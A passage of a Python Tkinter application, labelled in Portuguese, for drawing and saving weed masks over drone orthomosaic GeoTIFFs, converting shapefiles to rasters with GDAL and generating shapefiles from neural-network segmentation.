self.Scale2.configure(troughcolor=\"#d9d9d9\")\n \n self.next_icon = PhotoImage(file = r\"icons/next.png\")\n self.button_right = tk.Button(root, image = self.next_icon)\n self.button_right.place(relx=0.926, rely=0.363, height=83, width=43)\n self.button_right.configure(borderwidth=\"2\")\n #self.button_right.configure(text='>')\n\n self.back_icon = PhotoImage(file = r\"icons/back.png\")\n self.button_left = tk.Button(root, image = self.back_icon)\n self.button_left.place(relx=0.031, rely=0.363, height=83, width=43)\n self.button_left.configure(borderwidth=\"2\")\n self.button_left.configure(text='<')\n\n frame = tk.Frame(root, bd=2, relief=tk.SUNKEN)\n frame.grid_rowconfigure(0, weight=1)\n frame.grid_columnconfigure(0, weight=1)\n xscroll = tk.Scrollbar(frame, orient=tk.HORIZONTAL)\n #xscroll.grid(row=1, column=0, sticky=tk.E+tk.W)\n yscroll = tk.Scrollbar(frame)\n #yscroll.grid(row=0, column=1, sticky=tk.N+tk.S)\n self.canvas = tk.Canvas(frame, bd=0, width=self.iterator_x, height=self.iterator_y, xscrollcommand=xscroll.set, yscrollcommand=yscroll.set)\n \n #self.canvas = tk.Canvas(frame, bd=0, xscrollcommand=xscroll.set, yscrollcommand=yscroll.set)\n self.canvas.grid(row=0, column=0, sticky=tk.N+tk.S+tk.E+tk.W)\n #xscroll.config(command=self.canvas.xview)\n #yscroll.config(command=self.canvas.yview)\n frame.pack(expand=1)\n\n self.pencil_icon = PhotoImage(file = r\"icons/pencil_2.png\")\n self.pencil_icon = self.pencil_icon.subsample(1, 1)\n self.TButton1 = tk.Button(root, image = 
self.pencil_icon)\n self.TButton1.place(relx=0.132, rely=0.82, height=40, width=40)\n self.TButton1.configure(borderwidth=\"2\")\n self.TButton1.bind(\"\", partial(self.get_btn, key='6'))\n\n '''self.transp_icon = PhotoImage(file = r\"icons/transparency.png\")\n self.transp_icon = self.transp_icon.subsample(2, 2)\n self.TButton2 = tk.Button(root, image=self.transp_icon)\n self.TButton2.place(relx=0.831, rely=0.82, height=40, width=40)\n # self.TButton2.configure(borderwidth=\"2\")\n self.TButton2.configure(text='2')\n '''\n self.erase_icon = PhotoImage(file = r\"icons/erase.png\")\n self.erase_icon = self.erase_icon.subsample(1, 1)\n self.TButton3 = tk.Button(root, image=self.erase_icon)\n self.TButton3.place(relx=0.180, rely=0.82, height=40, width=40)\n self.TButton3.bind(\"\", partial(self.get_btn, key='7'))\n #self.TButton3.configure(takefocus=\"\")\n #self.TButton3.configure(text='3')\n\n def labelling_menu(self):\n\n self.label1.destroy()\n self.opt.destroy()\n\n self.label1 = tk.Label(root)\n self.label1.place(relx=0.115, rely=0.44, height=21, width=245)\n self.label1.configure(activebackground=\"#f9f9f9\")\n self.label1.configure(text='Escolha a porcentagem de iteração :')\n\n self.btn_load_mosaico = tk.Button(root)\n self.btn_load_mosaico.place(relx=0.72, rely=0.44, height=28, width=123)\n self.btn_load_mosaico.configure(takefocus=\"\")\n self.btn_load_mosaico.configure(text='Mosaico')\n self.btn_load_mosaico.bind('', partial(self.get_btn, key=\"0\"))\n\n self.label2 = tk.Label(root)\n self.label2.place(relx=0.11, rely=0.52, height=21, width=200)\n self.label2.configure(activebackground=\"#f9f9f9\")\n self.label2.configure(text='Selecione o Shape de Base :')\n\n self.btn_shape_reference = tk.Button(root)\n self.btn_shape_reference.place(relx=0.72, rely=0.52, height=28, width=123)\n self.btn_shape_reference.configure(takefocus=\"\")\n self.btn_shape_reference.configure(text='Shape de Base')\n self.btn_shape_reference.bind('', partial(self.get_btn, key=\"3\"))\n\n self.label3 = tk.Label(root)\n self.label3.place(relx=0.117, rely=0.60, height=21, width=260)\n self.label3.configure(activebackground=\"#f9f9f9\")\n self.label3.configure(text='Porcentagem de fundo preto permitida:')\n\n self.spinbox_backg = tk.Spinbox(root, from_=5.0, to=100.0, increment=5, textvariable=self.spn_box_1)\n self.spinbox_backg.place(relx=0.63, rely=0.60, relheight=0.046, relwidth=0.243)\n self.spinbox_backg.configure(activebackground=\"#f9f9f9\")\n self.spinbox_backg.configure(background=\"white\")\n self.spinbox_backg.configure(font=\"TkDefaultFont\")\n self.spinbox_backg.configure(highlightbackground=\"black\")\n self.spinbox_backg.configure(selectbackground=\"blue\")\n self.spinbox_backg.configure(selectforeground=\"white\")\n self.spinbox_backg.configure(command=partial(self.get_values_spinbox, type='Draw Weeds'))\n\n self.btn_start = tk.Button(root)\n self.btn_start.place(relx=0.742, rely=0.871, height=48, width=123)\n self.btn_start.configure(takefocus=\"\")\n self.btn_start.configure(text='Iniciar')\n self.btn_start.bind('', partial(self.get_btn, key=\"5\"))\n\n self.label4 = tk.Label(root)\n self.label4.place(relx=0.117, rely=0.69, height=21, width=235)\n self.label4.configure(text='Valor do comprimento da imagem :')\n\n self.spinbox2 = tk.Spinbox(root, from_=256.0, to=768.0, increment=256, textvariable=self.spn_box_2)\n self.spinbox2.place(relx=0.63, rely=0.69, relheight=0.046, relwidth=0.243)\n self.spinbox2.configure(activebackground=\"#f9f9f9\")\n self.spinbox2.configure(background=\"white\")\n 
self.spinbox2.configure(font=\"TkDefaultFont\")\n self.spinbox2.configure(highlightbackground=\"black\")\n self.spinbox2.configure(selectbackground=\"blue\")\n self.spinbox2.configure(selectforeground=\"white\")\n self.spinbox2.configure(command=partial(self.get_values_spinbox, type='Draw Weeds'))\n\n self.label5 = tk.Label(root)\n self.label5.place(relx=0.117, rely=0.76, height=21, width=186)\n self.label5.configure(text='Valor de altura da imagem :')\n\n self.spinbox3 = tk.Spinbox(root, from_=256.0, to=400.0, increment=256, textvariable=self.spn_box_3)\n self.spinbox3.place(relx=0.63, rely=0.76, relheight=0.046, relwidth=0.243)\n self.spinbox3.configure(activebackground=\"#f9f9f9\")\n self.spinbox3.configure(background=\"white\")\n self.spinbox3.configure(font=\"TkDefaultFont\")\n self.spinbox3.configure(highlightbackground=\"black\")\n self.spinbox3.configure(selectbackground=\"blue\")\n self.spinbox3.configure(selectforeground=\"white\")\n self.spinbox3.configure(command=partial(self.get_values_spinbox, type='Draw Weeds'))\n\n def first_menu(self, app):\n\n self.logo = PhotoImage(file = r\"icons/Logo-Escuro.png\")\n self.logo = self.logo.subsample(5, 5)\n self.canvas1 = tk.Canvas(root)\n self.canvas1.place(relx=0.117, rely=0.111, relheight=0.291, relwidth=0.752)\n self.canvas1.configure(borderwidth=\"2\")\n self.canvas1.configure(relief=\"ridge\")\n self.canvas1.configure(selectbackground=\"blue\")\n self.canvas1.configure(selectforeground=\"white\")\n self.canvas1.create_image(300,90,image=self.logo, anchor='center')\n\n self.label1 = tk.Label(root)\n self.label1.place(relx=0.25, rely=0.578, height=21, width=200)\n self.label1.configure(text='Selecione uma opção : ')\n\n self.variable = tk.StringVar(app)\n self.variable.set('Choose a Option')\n\n self.opt = tk.OptionMenu(app, self.variable, *self.OptionList)\n #opt.config(width=90, font=('Helvetica', 12))\n self.opt.place(x=self.width_size*0.50, y=self.hight_size*0.57)\n\n self.labelTest = tk.Label(text=\"\", font=('Helvetica', 12), fg='red')\n self.labelTest.pack(side=\"top\")\n\n self.variable.trace(\"w\", self.callback_opt)\n\n def remove_buttons(self, option='First Menu'):\n\n if option == 'Test Neural Network':\n self.btn_selet_image.destroy()\n self.btn_segmentation.destroy()\n self.btn_mask_true.destroy()\n self.btn_diff_imgs.destroy()\n\n self.painel_up_left.destroy()\n self.painel_up_right.destroy()\n self.painel_down_left.destroy()\n self.painel_down_right.destroy()\n\n elif option == 'Compare Results':\n self.TSeparator1.destroy()\n self.btn_load_mosaico.destroy()\n self.btn_shape_reference.destroy()\n self.btn_shape_neural.destroy()\n self.btn_start.destroy()\n self.spinbox1.destroy()\n self.spinbox2.destroy() \n self.spinbox3.destroy() \n self.label1.destroy() \n self.Radiobutton1.destroy() \n self.label2.destroy()\n self.label3.destroy() \n self.label4.destroy()\n self.label5.destroy()\n self.label6.destroy()\n self.label7.destroy()\n\n elif option == 'Draw Menu':\n self.label2.destroy()\n self.btn_shape_reference.destroy()\n self.label3.destroy()\n self.spinbox_backg.destroy()\n self.btn_start.destroy()\n self.btn_load_mosaico.destroy()\n self.spinbox3.destroy()\n self.spinbox2.destroy()\n self.label4.destroy()\n self.label5.destroy()\n\n\n else:\n \n self.canvas1.destroy()\n self.label1.destroy()\n\n self.opt.destroy()\n self.labelTest.destroy()\n\n def get_text(self): \n text_val = self.entry_text.get()\n \n label_init = tk.Label(root, text=text_val)\n self.canvas_init.create_window(200, 230, window=label_init)\n\n 
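# Reads the pencil-size slider; slider_pencil is clamped to a minimum of 10.\n    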
def get_current_value(self):\n self.slider_pencil = self.current_value.get()\n if self.slider_pencil < 10:\n self.slider_pencil = 10\n return '{: .2f}'.format(self.current_value.get())\n\n def slider_changed(self, event):\n self.value_label.configure(text=self.get_current_value())\n\n def get_values_spinbox(self, type=''):\n\n if type == 'Compare Results':\n\n if self.first_click_bool == False:\n self.iterator_recoil = float(int(self.spinbox1.get())/100)\n self.iterator_x = int(self.spinbox2.get())\n self.iterator_y = int(self.spinbox3.get())\n\n elif type == 'Draw Weeds':\n self.background_percent = float(1-int(self.spinbox_backg.get())/100)\n self.iterator_x = int(self.spinbox2.get())\n self.iterator_y = int(self.spinbox3.get())\n self.iterator_recoil = 1.0\n print(self.background_percent)\n \n else:\n values1 = self.iterator_recoil * 100\n values2 = self.iterator_x\n values3 = self.iterator_y\n\n def get_values_radio(self):\n self.first_click_bool = not (self.first_click_bool)\n \n if self.first_click_bool:\n bool_default = bool(self.bool_value.get())\n self.spn_box_1.set('80')\n self.spn_box_2.set('500')\n self.spn_box_3.set('400')\n #self.bool_value.set(bool_default)\n\n else:\n bool_default = False\n self.bool_value.set(bool_default)\n \n def get_btn(self, event, key):\n self.event_btn = key\n if key=='0':\n self.name_tif = self.load_shp(0)[0]\n\n elif key=='1':\n self.name_reference_binary = self.load_shp(1)[1]\n \n elif key=='2':\n self.name_reference_neural = self.load_shp(2)[2]\n\n elif key=='3':\n self.name_reference_binary = self.load_shp(1)[1]\n\n elif key=='6':\n self.option_draw = True\n\n elif key=='7':\n self.option_draw = False\n\n elif self.name_tif != '' and self.name_reference_binary != '' and self.name_reference_neural != '' and key=='5':\n root.geometry(\"800x600+400+100\")\n self.ready_start = False\n\n if self.name_tif != '' and self.name_reference_binary != '' and key=='5':\n #self.remove_buttons('Draw Menu')\n self.reference_binary = self.shp_to_bin( self.name_reference_binary, self.name_tif)\n self.daninha_1 = gdal.Open(self.reference_binary)\n self.daninha_band_1 = self.daninha_1.GetRasterBand(1)\n self.remove_buttons('Fisrt Menu')\n self.labelling_start()\n self.remove_buttons('Draw Menu')\n\n self.dst_img = gdal.GetDriverByName('GTiff').Create('resutado_gerado.tif', self.mosaico.RasterXSize, self.mosaico.RasterYSize, 1, gdal.GDT_Byte, options=['COMPRESS=DEFLATE'])\n self.dst_img.SetProjection(self.mosaico.GetProjectionRef())\n self.dst_img.SetGeoTransform(self.mosaico.GetGeoTransform()) \n\n self.button_right.bind(\"\", partial(self.button_click, key=\"1\"))\n self.button_left.bind(\"\", partial(self.button_click, key=\"0\"))\n\n\n if self.ready_start:\n self.rm_btn()\n \n self.reference_binary = gdal.Open(self.shp_to_bin(self.name_reference_binary, self.name_tif), 1)\n self.reference_neural = gdal.Open(self.shp_to_bin(self.name_reference_neural, self.name_tif), 1)\n \n self.dst_img = gdal.GetDriverByName('GTiff').Create(self.name_reference_binary + '_out_2.tif', self.reference_binary.RasterXSize, self.reference_binary.RasterYSize, 1, gdal.GDT_Byte, options=['COMPRESS=DEFLATE'])\n self.dst_img.SetProjection(self.reference_binary.GetProjectionRef())\n self.dst_img.SetGeoTransform(self.reference_binary.GetGeoTransform()) \n\n button_left = tk.Button(root, text=\"Back\")\n button_left.place(relx=0.02, rely=0.4, height=48, width=100)\n button_left.bind(\"\", partial(self.button_click, key=\"0\"))\n\n button_right = tk.Button(root, text=\"Next\")\n 
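# "Back"/"Next" step the crop window across the mosaic (handled by button_click).\n            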
button_right.place(relx=0.85, rely=0.4, height=48, width=100)\n button_right.bind(\"\", partial(self.button_click, key=\"1\"))\n\n def run(self):\n self.labelling_start()\n \n def create_buttons(self):\n #Botao para Selecionar uma Imagem\n root.maxsize(700, 700) \n\n self.btn_selet_image = tk.Button(root, text=\"Select an image\", command=self.select_image)\n self.btn_selet_image.place(x=50, y=10)\n\n #Botao para Segmentacao\n self.btn_segmentation = tk.Button(root, text=\"Apply Segmentation\", command=self.predict_image)\n self.btn_segmentation.place(x=400, y=10)\n\n #Botao para escolher a marcara de referencia\n self.btn_mask_true = tk.Button(root, text=\"Select Mask\", command=self.select_true_binary)\n self.btn_mask_true.place(x=50, y=326)\n\n #Botao para analisar as diferencas entre a predicao e a mascara\n self.btn_diff_imgs = tk.Button(root, text=\"Differences\", command=self.diff_imgs)\n self.btn_diff_imgs.place(x=400, y=326)\n\n #Paineis para Exibicao\n #Painel Superior Esquerdo\n self.painel_up_left = tk.Label(root)\n self.painel_up_left.place(x=20, y=50)\n\n #Painel Superior Direito\n self.painel_up_right = tk.Label(root)\n self.painel_up_right.place(x=320, y=50)\n\n #Painel Inferior Esquerdo \n self.painel_down_left = tk.Label(root)\n self.painel_down_left.place(x=20, y=366)\n\n #Painel Inferior Direito\n self.painel_down_right = tk.Label(root)\n self.painel_down_right.place(x=320, y=366)\n\n def select_image(self):\n\n self.path_rgb = filedialog.askopenfilename()\n if self.path_rgb:\n \n self.img_rgb = cv2.imread(self.path_rgb, -1)\n self.img_rgb = cv2.resize(self.img_rgb, (256,256))\n\n image = Image.fromarray(self.img_rgb)\n image_tk = ImageTk.PhotoImage(image)\n\n self.painel_up_left.configure(image=image_tk)\n self.painel_up_left.image = image_tk\n\n def callback_opt(self, *args):\n\n if (self.old_choose == 'Test Neural Network' and self.variable.get() != 'Test Neural Network'):\n self.remove_buttons()\n\n if(self.variable.get() == 'Test Neural Network'):\n self.labelTest.destroy()\n self.opt.destroy()\n self.create_buttons()\n\n elif(self.variable.get() == 'Generate Shape from RGB Tif'):\n\n root.maxsize(self.width_size, self.hight_size) \n if self.load_rgb_tif()[0]:\n self.generate_binary_tif()\n self.generate_shape()\n\n else:\n mbox.showerror('Error', 'Nenhum Ortomosaico.tif foi Selecionado :')\n tif_loaded = False\n \n elif(self.variable.get() == 'Generate Shape from Binary Tif'):\n root.maxsize(self.width_size, self.hight_size) \n if self.load_rgb_tif()[0]:\n self.generate_shape()\n else:\n mbox.showerror('Error', 'Nenhum Ortomosaico.tif foi Selecionado :')\n tif_loaded = False\n\n elif(self.variable.get() == 'Compare Results'):\n\n root.maxsize(self.width_size, self.hight_size)\n self.name_tif = self.load_rgb_tif()\n\n [unused, self.name_reference_binary, self.name_reference_neural] = self.load_shp(3)\n #self.reference_binary = self.shp_to_bin(name_reference_binary)\n\n self.reference_binary = gdal.Open(self.shp_to_bin(self.name_reference_binary, self.name_tif[1]))\n self.reference_neural = gdal.Open(self.shp_to_bin(self.name_reference_neural, self.name_tif[1]))\n\n if self.name_tif[0]:\n\n button_left = tk.Button(root, text=\"Back\")\n button_left.place(x=self.width_size*0.04, y=self.hight_size*0.5)\n button_left.bind(\"\", partial(self.button_click, key=\"0\"))\n\n button_right = tk.Button(root, text=\"Next\")\n button_right.place(x=self.width_size*0.70, y=self.hight_size*0.5)\n button_right.bind(\"\", partial(self.button_click, key=\"1\"))\n \n else:\n 
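# no mosaic .tif was selected - warn the user and leave tif_loaded False\n                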
mbox.showerror('Error', 'Nenhum Ortomosaico.tif foi Selecionado :')\n tif_loaded = False\n \n elif(self.variable.get() == 'Draw Weeds'):\n\n if not os.path.isdir(self.path_save_img_rgb):\n os.makedirs(self.path_save_img_rgb, exist_ok=True)\n \n if not os.path.isdir(self.path_save_img_bin):\n os.makedirs(self.path_save_img_bin, exist_ok=True)\n\n self.labelling_menu()\n\n self.old_choose = self.variable.get()\n \n def button_click(self, event=None, key=None):\n if (self.bool_draw):\n cv2.imwrite(self.path_save_img_rgb + '/daninha_{x}_{y}.png'.format(x=int(self.x_crop),y=int(self.y_crop)), self.imgparcela)\n cv2.imwrite(self.path_save_img_bin + '/daninha_{x}_{y}.png'.format(x=int(self.x_crop),y=int(self.y_crop)), self.save_draw_array)\n self.dst_img.GetRasterBand(1).WriteArray(self.save_draw_array, xoff=self.x_crop, yoff=self.y_crop)\n self.dst_img.FlushCache()\n\n self.bool_draw = False\n self.draw_lines_array.clear()\n self.draw_img = PIL.Image.new(\"RGB\",(self.iterator_x, self.iterator_y),(0,0,0))\n self.draw_line = PIL.ImageDraw.Draw(self.draw_img)\n self.cnt_validator = []\n \n if (key == \"1\"):\n if (self.x_crop + self.iterator_x < self.mosaico.RasterXSize and self.x_crop + self.iterator_x > 0):\n self.x_crop += self.iterator_x * self.iterator_recoil\n print('key 1 - if 0')\n\n if self.x_crop + self.iterator_x > self.mosaico.RasterXSize:\n self.x_max = self.x_crop - self.iterator_x * self.iterator_recoil\n print('entrou')\n\n if (self.x_crop + self.iterator_x > self.mosaico.RasterXSize):\n self.x_crop = 0\n self.y_crop += self.iterator_y * self.iterator_recoil\n print('key 1 - if 1')\n\n\n if (self.y_crop + self.iterator_y > self.mosaico.RasterYSize):\n self.x_crop = self.x_crop\n self.y_crop = self.y_crop\n print('key 1 - if 2')\n mbox.showinfo(title='Todo o Mosaico foi Percorrido!')\n\n self.daninha_parcela = self.daninha_band_1.ReadAsArray(self.x_crop, self.y_crop, self.iterator_x, self.iterator_y)\n while cv2.countNonZero(self.daninha_parcela) <= self.iterator_x*self.iterator_y*0.05:\n if (self.x_crop + self.iterator_x < self.mosaico.RasterXSize and self.x_crop + self.iterator_x > 0):\n self.x_crop += self.iterator_x * self.iterator_recoil\n print('key 1 - if 0')\n\n if self.x_crop + self.iterator_x > self.mosaico.RasterXSize:\n self.x_max = self.x_crop - self.iterator_x * self.iterator_recoil\n print('entrou')\n\n if (self.x_crop + self.iterator_x > self.mosaico.RasterXSize):\n self.x_crop = 0\n self.y_crop += self.iterator_y * self.iterator_recoil\n print('key 1 - if 1')\n\n if (self.y_crop + self.iterator_y > self.mosaico.RasterYSize):\n self.x_crop = self.x_crop\n self.y_crop = self.y_crop\n print('key 1 - if 2')\n mbox.showinfo(title='Todo o Mosaico foi Percorrido!')\n break\n self.daninha_parcela = self.daninha_band_1.ReadAsArray(self.x_crop, self.y_crop, self.iterator_x, self.iterator_y)\n\n elif (key == \"0\"):\n if (self.x_crop - self.iterator_x < self.mosaico.RasterXSize):\n self.x_crop -= self.iterator_x * self.iterator_recoil\n print('key 0 - if 1')\n\n if self.x_crop <= 0: \n self.x_crop = self.x_max\n self.y_crop -= self.iterator_y * self.iterator_recoil\n print('key 0 - if 2')\n\n if (self.y_crop - self.iterator_y > self.mosaico.RasterYSize):\n self.x_crop =0\n self.y_crop -= self.iterator_y * self.iterator_recoil\n print('aqui2')\n \n self.daninha_parcela = self.daninha_band_1.ReadAsArray(self.x_crop, self.y_crop, self.iterator_x, self.iterator_y)\n while cv2.countNonZero(self.daninha_parcela) <= self.iterator_x*self.iterator_y*0.05:\n if (self.x_crop - 
self.iterator_x < self.mosaico.RasterXSize):\n self.x_crop -= self.iterator_x * self.iterator_recoil\n print('key 0 - if 1')\n\n if self.x_crop <= 0: \n self.x_crop = self.x_max\n self.y_crop -= self.iterator_y * self.iterator_recoil\n print('key 0 - if 2')\n\n if (self.y_crop - self.iterator_y > self.mosaico.RasterYSize):\n self.x_crop =0\n self.y_crop -= self.iterator_y * self.iterator_recoil\n print('aqui2')\n \n self.daninha_parcela = self.daninha_band_1.ReadAsArray(self.x_crop, self.y_crop, self.iterator_x, self.iterator_y)\n print('x :', self.x_crop,', y :', self.y_crop)\n self.daninha_parcela = self.daninha_band_1.ReadAsArray(self.x_crop, self.y_crop, self.iterator_x, self.iterator_y)\n #while (cv2.countNonZero(self.daninha_parcela) == 0): \n \n blueparcela = self.blue.ReadAsArray(self.x_crop, self.y_crop,self.iterator_x, self.iterator_y)\n greenparcela = self.green.ReadAsArray(self.x_crop, self.y_crop,self.iterator_x, self.iterator_y)\n redparcela = self.red.ReadAsArray(self.x_crop, self.y_crop,self.iterator_x, self.iterator_y)\n self.imgparcela = cv2.merge((blueparcela, greenparcela, redparcela))\n\n '''\n img_neural = self.reference_neural.ReadAsArray(self.x_crop, self.y_crop,self.iterator_x, self.iterator_y)\n self.img_binary = self.reference_binary.ReadAsArray(self.x_crop, self.y_crop,self.iterator_x, self.iterator_y)\n union, self.dif = nf.diff_contourns(self, img_neural, self.img_binary)\n \n self.contours = nf.find_contourns(self, self.dif)\n self.draw = cv2.drawContours(self.imgparcela, self.contours, -1, (255, 0, 0), 3)\n \n img = PIL.Image.fromarray(self.draw)'''\n\n img = PIL.Image.fromarray(self.imgparcela)\n self.image_tk = ImageTk.PhotoImage(img)\n self.array_clicks.clear()\n self.first_click = True\n self.canvas.grid(row=0, column=0, sticky=tk.N+tk.S+tk.E+tk.W)\n self.canvas.create_image(self.iterator_x // 2, self.iterator_y // 2, image=self.image_tk, anchor=tk.CENTER)\n self.canvas.config(scrollregion=self.canvas.bbox(tk.ALL))\n\n self.canvas.bind(\"\", self.get_x_and_y)\n self.canvas.bind(\"\", self.draw_smth)\n #cv2.countNonZero(self.save_draw_array)\n \n \n def get_x_and_y(self, event):\n global lasx, lasy\n lasx, lasy = event.x, event.y\n #self.array_clicks.append(lasx)\n #self.array_clicks.append(lasy)\n\n def draw_smth(self, event):\n global lasx, lasy\n if(self.option_draw):\n self.line_obj = self.canvas.create_line((lasx, lasy, event.x, event.y), \n fill='red', capstyle=tk.ROUND, \n joinstyle=tk.ROUND, width=int(self.slider_pencil),\n smooth=True, splinesteps=12,\n dash=(3,5))\n ''' \n self.canvas_draw = self.canvas.create_polygon((self.array, event.x, event.y), \n fill='red', capstyle=tk.ROUND, \n joinstyle=tk.ROUND, width=10,\n smooth=True, splinesteps=12,\n dash=(3,5))\n '''\n lasx, lasy = event.x, event.y\n self.draw_line.line((lasx, lasy, event.x, event.y), (255,255,255), width=int(self.slider_pencil), joint='curve')\n\n Offset = (int(self.slider_pencil)-1)/2\n self.draw_line.ellipse ((lasx-Offset,lasy-Offset,lasx+Offset,lasy+Offset), (255,255,255))\n \n x = [[self.line_obj, lasx, lasy]]\n \n self.draw_lines_array.extend(x)\n\n else:\n lasx, lasy = event.x, event.y\n for i in range(0, len(self.draw_lines_array[:][:]), 1):\n if lasx - self.slider_pencil <= self.draw_lines_array[:][i][1] and lasx + self.slider_pencil > self.draw_lines_array[:][i][1] and \\\n lasy - self.slider_pencil <= self.draw_lines_array[:][i][2] and lasy + self.slider_pencil > self.draw_lines_array[:][i][2]:\n print('x_cord :', lasx, 'y_cord :',lasy)\n 
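# a stored stroke sits under the eraser: remove it from the canvas and paint it black in the mask\n                    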
print(self.draw_lines_array[:][i])\n self.canvas.delete(self.draw_lines_array[:][i][0])\n self.draw_line.line((lasx, lasy, event.x, event.y), (0,0,0), width=int(self.slider_pencil), joint='curve')\n Offset = (int(self.slider_pencil))/2\n self.draw_line.ellipse ((lasx-Offset,lasy-Offset,lasx+Offset,lasy+Offset), (0,0,0))\n self.bool_draw = True\n print(self.draw_lines_array) \n self.save_draw_array = np.asarray(self.draw_img)\n self.save_draw_array = nf.prepare_array(self, self.save_draw_array)\n #self.save_draw_array = nf.prepare_array(self, self.save_draw_array)\n #ia.imshow(self.save_draw_array[0][0]) \n \n def printcoords(self, event):\n\n cx, cy = self.event2canvas(event, self.canvas)\n self.ctn = []\n if self.first_click == True: \n\n for i in range(0, len(self.contours)):\n self.cnt_validator.append(False)\n self.img_fit = cv2.fillPoly(self.dif, pts=self.contours, color=(0,0,0))\n\n self.first_click = False\n\n for i in range(0, len(self.cnt_validator)): \n r = cv2.pointPolygonTest(self.contours[i], (cx, cy), False)\n if r > 0:\n self.cnt_validator[i] = (not self.cnt_validator[i]) \n self.ctn = self.contours[i]\n\n if self.cnt_validator[i] == True:\n self.draw = cv2.drawContours(self.imgparcela, self.ctn, -1, (0, 255, 0), 3)\n self.img_fit = cv2.fillPoly(self.dif, pts=[self.ctn], color=(255,255,255))\n\n union_ref_checker = self.diff_contourns(self.img_binary, self.img_fit)[0]\n self.dst_img.GetRasterBand(1).WriteArray(union_ref_checker, xoff=self.x_crop, yoff=self.y_crop)\n\n else:\n self.draw = cv2.drawContours(self.imgparcela, self.ctn, -1, (255, 0, 0), 3)\n self.img_fit = cv2.fillPoly(self.dif, pts=[self.ctn], color=(0,0,0))\n\n img = PIL.Image.fromarray(self.draw)\n image_tk = ImageTk.PhotoImage(img)\n #self.canvas.destroy()\n #self.canvas.pack(fill=tk.BOTH,expand=0)\n #self.painel_center.image=image_tk\n\n def save_in_reference_tif(self):\n\n if self.reference_neural.endswith('tif'):\n self.red = self.mosaico.GetRasterBand(1)\n\n self.dst_img = gdal.GetDriverByName('GTiff').Create(str(self.reference_neural), self.nx, self.ny, 1, gdal.GDT_Byte)\n self.dst_img.SetGeoTransform(self.mosaico.GetGeoTransform())\n self.srs = osr.SpatialReference()\n self.srs.ImportFromWkt(self.mosaico.GetProjection())\n self.dst_img.SetProjection(self.srs.ExportToWkt())\n\n def load_rgb_tif(self):\n\n path_rgb_shp = filedialog.askopenfilename(title='Selecione O Mosaico')\n if path_rgb_shp.endswith('tif'):\n\n self.mosaico = gdal.Open(path_rgb_shp)\n self.red = self.mosaico.GetRasterBand(1)\n self.green = self.mosaico.GetRasterBand(2)\n self.blue = self.mosaico.GetRasterBand(3)\n self.alpha = self.mosaico.GetRasterBand(4)\n\n self.nx = self.mosaico.RasterXSize \n self.ny = self.mosaico.RasterYSize\n\n file_path = pathlib.Path(path_rgb_shp)\n self.out_file = pathlib.Path('/')\n self.out_file = file_path.parent/(\"out\" + \".shp\")\n path_temp = file_path.parent/'temp_files'\n\n if path_temp.exists():\n shutil.rmtree(str(path_temp))\n os.mkdir(str(path_temp))\n else:\n os.mkdir(str(path_temp))\n \n self.dst_img = gdal.GetDriverByName('GTiff').Create(str(path_temp/'outfile.tif'), self.nx, self.ny, 1, gdal.GDT_Byte)\n self.dst_img.SetGeoTransform(self.mosaico.GetGeoTransform())\n self.srs = osr.SpatialReference()\n self.srs.ImportFromWkt(self.mosaico.GetProjection())\n self.dst_img.SetProjection(self.srs.ExportToWkt())\n tif_loaded = True\n \n else:\n mbox.showerror('Error', 'Selecione um Arquivo .tif')\n tif_loaded = False\n \n return tif_loaded, path_rgb_shp\n\n def load_shp(self, type_shape=0, 
option='Compare Results'):\n        \"\"\"\n        Loads the shapefile that will be used in the comparisons\n        type : 0 - Loads the mosaic \n               1 - The reference shapefile\n               2 - The neural-network shapefile\n               3 - Both shapefiles\n        option : The type of operation to be executed\n        \"\"\"\n        if option == 'Compare Results':\n            if type_shape == 0:\n\n                path_reference_tif = self.load_rgb_tif()[1]\n                path_reference_shp = None\n                path_neural_shp = None\n\n            elif type_shape == 1:\n                path_reference_tif = None\n                path_reference_shp = filedialog.askopenfilename(title='Selecione o Shape de Referência :')\n                path_neural_shp = None\n\n            elif type_shape == 2:\n                path_reference_tif = None\n                path_reference_shp = None\n                path_neural_shp = filedialog.askopenfilename(title='Selecione o Shape da Rede Neural :')\n\n            elif type_shape == 3:\n                path_reference_shp = filedialog.askopenfilename(title='Selecione o Shape de Referência :')\n                path_reference_tif = None\n                path_neural_shp = filedialog.askopenfilename(title='Selecione o Shape da Rede Neural :')\n\n        return path_reference_tif, path_reference_shp, path_neural_shp\n\n    def shp_to_bin(self, name_shp, name_tif, burn=255):\n\n        base_img = gdal.Open(name_tif, gdal.GA_ReadOnly)\n        base_shp = ogr.Open(name_shp)\n        base_shp_layer = base_shp.GetLayer()\n\n        #output_name = name_shp + '_out.tif'\n        output = gdal.GetDriverByName('GTiff').Create(name_shp + '_out.tif', base_img.RasterXSize, base_img.RasterYSize, 1, gdal.GDT_Byte, options=['COMPRESS=DEFLATE'])\n        output.SetProjection(base_img.GetProjectionRef())\n        output.SetGeoTransform(base_img.GetGeoTransform()) \n\n        Band = output.GetRasterBand(1)\n        raster = gdal.RasterizeLayer(output, [1], base_shp_layer, burn_values=[burn])\n\n        Band = None\n        output = None\n        base_img = None\n        base_shp = None\n\n        return name_shp + '_out.tif'\n\n    def generate_binary_tif(self): \n        mbox.showinfo(\"Information\", \"Gerando Resultados: Isso pode demorar um pouco: \")\n        iterator_x = 256\n        iterator_y = 256\n\n        for x in range(0, self.mosaico.RasterXSize, iterator_x):\n\n            for y in range(0, self.mosaico.RasterYSize, iterator_y):\n                \n                if ((x+iterator_x)>self.mosaico.RasterXSize) or ((y+iterator_y)>self.mosaico.RasterYSize):\n                    continue\n                \n                blueparcela = self.blue.ReadAsArray(x,y,iterator_x,iterator_y)\n                greenparcela = self.green.ReadAsArray(x,y,iterator_x,iterator_y)\n                redparcela = self.red.ReadAsArray(x,y,iterator_x,iterator_y)\n                self.imgparcela = cv2.merge((blueparcela,greenparcela,redparcela))\n                img = self.imgparcela / 255\n\n                pr = nf.predict_image(self, img)\n                \n                if (self.imgparcela.max()>0) and (self.imgparcela.min()<255):\n                    write_image = pr\n\n                else:\n                    pr[pr>=255]= 0\n                    write_image = pr\n                \n                self.dst_img.GetRasterBand(1).WriteArray(write_image, xoff=x, yoff=y)\n                self.dst_img.FlushCache()\n\n    def generate_shape(self):\n        src_band = self.dst_img.GetRasterBand(1)\n        dst_layername = 'daninhas'\n        drv = ogr.GetDriverByName(\"ESRI Shapefile\")\n        dst_ds = drv.CreateDataSource(str(self.out_file))\n        dst_layer = dst_ds.CreateLayer(dst_layername, srs = self.srs)\n\n        gdal.Polygonize(src_band, src_band, dst_layer, -1, [], callback=None )\n        dst_ds.Destroy()\n        mbox.showinfo(\"Information\", \"Shape Gerado com Sucesso!: 